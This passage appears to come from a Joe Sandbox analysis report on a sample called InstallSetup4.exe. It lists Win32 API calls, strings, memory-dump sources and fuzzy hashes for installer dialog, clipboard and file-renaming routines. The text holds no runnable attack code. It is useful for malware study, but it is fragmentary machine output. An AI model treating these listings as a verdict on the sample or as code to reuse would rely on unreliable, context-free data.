                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004058F0
                                                                                            • ShowWindow.USER32(00000000), ref: 00405914
                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405919
                                                                                            • ShowWindow.USER32(00000008), ref: 00405963
                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405997
                                                                                            • CreatePopupMenu.USER32 ref: 004059A8
                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059BC
                                                                                            • GetWindowRect.USER32(?,?), ref: 004059DC
                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059F5
                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2D
                                                                                            • OpenClipboard.USER32(00000000), ref: 00405A3D
                                                                                            • EmptyClipboard.USER32 ref: 00405A43
                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4F
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405A59
                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6D
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405A8D
                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405A98
                                                                                            • CloseClipboard.USER32 ref: 00405A9E
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                            • String ID: {
                                                                                            • API String ID: 590372296-366298937
                                                                                            • Opcode ID: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
                                                                                            • Instruction ID: 234ab3d0ec1f6487b719ed7b99e1d6b4405f443d9e8d78e252fa94ab3ac4d3a1
                                                                                            • Opcode Fuzzy Hash: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
                                                                                            • Instruction Fuzzy Hash: 34B139B1900608FFDB11AF60DD89AAE7B79FB48355F00813AFA41BA1A0C7785A51DF58
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404A16
                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00404A40
                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404AF1
                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404AFC
                                                                                            • lstrcmpiW.KERNEL32(004326A0,0042CA68,00000000,?,?), ref: 00404B2E
                                                                                            • lstrcatW.KERNEL32(?,004326A0), ref: 00404B3A
                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B4C
                                                                                              • Part of subcall function 00405B9B: GetDlgItemTextW.USER32(?,?,00000400,00404B83), ref: 00405BAE
                                                                                              • Part of subcall function 00406805: CharNextW.USER32(?,*?|<>/":,00000000,0043F000,76F93420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
                                                                                              • Part of subcall function 00406805: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
                                                                                              • Part of subcall function 00406805: CharNextW.USER32(?,0043F000,76F93420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
                                                                                              • Part of subcall function 00406805: CharPrevW.USER32(?,?,76F93420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                                                                            • GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C0F
                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C2A
                                                                                              • Part of subcall function 00404D83: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
                                                                                              • Part of subcall function 00404D83: wsprintfW.USER32 ref: 00404E2D
                                                                                              • Part of subcall function 00404D83: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
                                                                                            Similarity
                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                            • String ID: A
                                                                                            • API String ID: 2624150263-3554254475
                                                                                            • Opcode ID: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                                                                            • Instruction ID: 8a45afd3ee22384d80319c7ed67abe130e578f1d2b392c1e8909742cb30e522b
                                                                                            • Opcode Fuzzy Hash: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                                                                            • Instruction Fuzzy Hash: FCA192B1900208ABDB11EFA5DD45BAFB7B8EF84314F11803BF611B62D1D77C9A418B69
                                                                                            APIs
                                                                                            • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp, xrefs: 0040226E
                                                                                            Similarity
                                                                                            • API ID: CreateInstance
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp
                                                                                            • API String ID: 542301482-3067928993
                                                                                            • Opcode ID: 54fcaebf65a6d80a769d2ffe25eeb1568fba929b3fba522b5b89cb6b807999ae
                                                                                            • Instruction ID: f0c409d0c9855dc16f3492d495f607d4fcaf843261c47ee8c1995525671fe781
                                                                                            • Opcode Fuzzy Hash: 54fcaebf65a6d80a769d2ffe25eeb1568fba929b3fba522b5b89cb6b807999ae
                                                                                            • Instruction Fuzzy Hash: 76411471A00208AFCB40DFE4C989EAD7BB5FF48308B20457AF515EB2D1DB799982CB54
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
                                                                                            Similarity
                                                                                            • API ID: FileFindFirst
                                                                                            • String ID:
                                                                                            • API String ID: 1974802433-0
                                                                                            • Opcode ID: f7eec81d6910abfa52e209e80917fba1586809f9bcb970d7ef1d97902b1d379f
                                                                                            • Instruction ID: 4f8030157269cd498ea314d5a86e386b0cfb994e1dea9c94a4400a3869289cfc
                                                                                            • Opcode Fuzzy Hash: f7eec81d6910abfa52e209e80917fba1586809f9bcb970d7ef1d97902b1d379f
                                                                                            • Instruction Fuzzy Hash: 17F08C71A04104AAD701EBE4EE499AEB378EF14324F60457BE102F31E0DBB85E159B2A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
                                                                                            • Instruction ID: a5eb8001d75a17d38d83411349fde439c8a9064fda1b18d7f978e280ae41e255
                                                                                            • Opcode Fuzzy Hash: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
                                                                                            • Instruction Fuzzy Hash: ACE19C71A04709DFCB24CF58C880BAABBF1FF45305F15852EE496A72D1E378AA51CB05
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                                                                            • Instruction ID: e409ec8ffb443055957628c835c79614664982182129ebc37b3e11cb9bcd83e5
                                                                                            • Opcode Fuzzy Hash: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                                                                            • Instruction Fuzzy Hash: ECC14772E04219CBCF18CF68C4905EEBBB2BF98354F25866AD85677380D7346942CF95
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404F5B
                                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404F66
                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404FB0
                                                                                            • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FC7
                                                                                            • SetWindowLongW.USER32(?,000000FC,00405550), ref: 00404FE0
                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FF4
                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405006
                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 0040501C
                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405028
                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040503A
                                                                                            • DeleteObject.GDI32(00000000), ref: 0040503D
                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405068
                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405074
                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040510F
                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040513F
                                                                                              • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405153
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00405181
                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040518F
                                                                                            • ShowWindow.USER32(?,00000005), ref: 0040519F
                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040529A
                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FF
                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405314
                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405338
                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405358
                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 0040536D
                                                                                            • GlobalFree.KERNEL32(?), ref: 0040537D
                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053F6
                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040549F
                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AE
                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004054D9
                                                                                            • ShowWindow.USER32(?,00000000), ref: 00405527
                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 00405532
                                                                                            • ShowWindow.USER32(00000000), ref: 00405539
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                            • String ID: $M$N
                                                                                            • API String ID: 2564846305-813528018
                                                                                            • Opcode ID: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
                                                                                            • Instruction ID: 91097811874ce85ba3cc7540bcf7dd58db25a3d6f071223140e4d1ec27d7ea12
                                                                                            • Opcode Fuzzy Hash: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
                                                                                            • Instruction Fuzzy Hash: 6C029C70900608AFDF20DF94DD85AAF7BB5FB85314F10817AE611BA2E1D7798A41CF58
                                                                                            APIs
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404013
                                                                                            • ShowWindow.USER32(?), ref: 00404033
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404045
                                                                                            • ShowWindow.USER32(?,00000004), ref: 0040405E
                                                                                            • DestroyWindow.USER32 ref: 00404072
                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040408B
                                                                                            • GetDlgItem.USER32(?,?), ref: 004040AA
                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BE
                                                                                            • IsWindowEnabled.USER32(00000000), ref: 004040C5
                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00404170
                                                                                            • GetDlgItem.USER32(?,00000002), ref: 0040417A
                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00404194
                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E5
                                                                                            • GetDlgItem.USER32(?,00000003), ref: 0040428B
                                                                                            • ShowWindow.USER32(00000000,?), ref: 004042AC
                                                                                            • EnableWindow.USER32(?,?), ref: 004042BE
                                                                                            • EnableWindow.USER32(?,?), ref: 004042D9
                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EF
                                                                                            • EnableMenuItem.USER32(00000000), ref: 004042F6
                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430E
                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404321
                                                                                            • lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040434B
                                                                                            • SetWindowTextW.USER32(?,0042CA68), ref: 0040435F
                                                                                            • ShowWindow.USER32(?,0000000A), ref: 00404493
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 1860320154-0
                                                                                            • Opcode ID: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
                                                                                            • Instruction ID: 911e0a6aef898d83942fe666095560f38e6effa11f08765efd6836b1f10f2e9c
                                                                                            • Opcode Fuzzy Hash: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
                                                                                            • Instruction Fuzzy Hash: 29C1B0B1500204BBDB206F61EE89A2B3A68FB85756F01053EF781B51F0CB3958929B2D
                                                                                            APIs
                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404733
                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404747
                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404764
                                                                                            • GetSysColor.USER32(?), ref: 00404775
                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404783
                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404791
                                                                                            • lstrlenW.KERNEL32(?), ref: 00404796
                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047A3
                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B8
                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 00404811
                                                                                            • SendMessageW.USER32(00000000), ref: 00404818
                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404843
                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404886
                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00404894
                                                                                            • SetCursor.USER32(00000000), ref: 00404897
                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 004048B0
                                                                                            • SetCursor.USER32(00000000), ref: 004048B3
                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048E2
                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048F4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                            • String ID: N
                                                                                            • API String ID: 3103080414-1130791706
                                                                                            • Opcode ID: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
                                                                                            • Instruction ID: 3ad42440e7936429012ccc374b67200ab01768f99e4ad58672f49272ac14a637
                                                                                            • Opcode Fuzzy Hash: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
                                                                                            • Instruction Fuzzy Hash: 2E6181B1900209BFDB10AF60DD85EAA7B69FB84315F00853AFA05B62D0C779A951DF98
                                                                                            APIs
                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                            • DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                            • String ID: F
                                                                                            • API String ID: 941294808-1304234792
                                                                                            • Opcode ID: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                                                                            • Instruction ID: eca0ad76d85821e0a7fbe67f508e5060b260b918cc65b70bf06bca200ae74670
                                                                                            • Opcode Fuzzy Hash: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                                                                            • Instruction Fuzzy Hash: 2F418B71800209AFCB058FA5DE459AFBFB9FF45314F00802EF591AA1A0C738EA54DFA4
                                                                                            APIs
                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406338,?,?), ref: 004061D8
                                                                                            • GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 004061E1
                                                                                              • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
                                                                                              • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE
                                                                                            • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061FE
                                                                                            • wsprintfA.USER32 ref: 0040621C
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406257
                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406266
                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629E
                                                                                            • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F4
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00406305
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040630C
                                                                                              • Part of subcall function 00406047: GetFileAttributesW.KERNEL32(00000003,004030C2,C:\Users\user\AppData\Local\Temp\InstallSetup4.exe,80000000,00000003), ref: 0040604B
                                                                                              • Part of subcall function 00406047: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                            • String ID: %ls=%ls$[Rename]
                                                                                            • API String ID: 2171350718-461813615
                                                                                            • Opcode ID: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
                                                                                            • Instruction ID: 2f157a22eecee44515c187ff3daf75b9e7e255f904fde787f0dd9ddf92a1116e
                                                                                            • Opcode Fuzzy Hash: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
                                                                                            • Instruction Fuzzy Hash: C9312271200315BBD2206B619D49F2B3A5CEF85718F16043EFD42FA2C2DB7D99258ABD
                                                                                            APIs
                                                                                            • GetSystemDirectoryW.KERNEL32(004326A0,00000400), ref: 004066B6
                                                                                            • GetWindowsDirectoryW.KERNEL32(004326A0,00000400,00000000,0042BA48,?,?,00000000,00000000,00428E20,76F923A0), ref: 004066CC
                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,004326A0), ref: 0040672A
                                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406733
                                                                                            • lstrcatW.KERNEL32(004326A0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040675E
                                                                                            • lstrlenW.KERNEL32(004326A0,00000000,0042BA48,?,?,00000000,00000000,00428E20,76F923A0), ref: 004067B8
                                                                                            Strings
                                                                                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406687
                                                                                            • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406758
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                            • API String ID: 4024019347-730719616
                                                                                            • Opcode ID: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                                                            • Instruction ID: fc62ecdfc612bfadb4c03fc2fb2820e4449372332e166df7cb208319b666a0da
